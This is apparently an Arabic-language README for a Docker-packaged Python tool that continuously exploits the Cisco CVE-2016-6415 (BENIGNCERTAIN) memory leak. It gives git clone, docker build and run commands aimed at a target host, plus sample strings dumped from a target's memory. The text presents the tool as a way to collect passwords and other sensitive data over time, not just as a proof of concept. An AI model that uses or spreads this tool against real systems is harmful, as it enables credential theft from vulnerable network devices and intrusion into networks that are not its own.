
إعادة تنفيذ أداة benigncertain-monitor من VirtueSecurity
إعادة تنفيذ لـ benigncertain-monitor الخاص بـ VirtueSecurity. لا يحتوي على جميع خيارات الحمولة نفسها كما في النسخة الأصلية، ولكنه يستبدل الثنائي bc-id بإثبات مفهوم أفضل من Ross Bradley يمكن توسيعه إذا لزم الأمر.
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
ستقوم الخدمة بالاستطلاع المستمر للخدمة المعرضة للخطر، واستخراج السلاسل النصية ASCII من الذاكرة، وتخزين السلاسل في قاعدة بيانات SQLite محلية، وعرض السلاسل الأكثر تكرارًا:
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
هذا نص برمجي بايثون مُحَوَّل إلى Docker يقوم بتسريب ذاكرة هدف معرض لاختراق NSA BENIGNCERTAIN لـ Cisco CVE-2016-6415 بشكل مستمر.
يقوم النص البرمجي باستطلاع الخدمة المعرضة للخطر على مر الزمن لتحديد كلمات المرور المحتملة وغيرها من المعلومات الحساسة المحتملة. يمكن استخدام هذا لجمع بيانات قابلة للتنفيذ على مدى فترة زمنية بدلاً من مجرد استغلال إثبات مفهوم.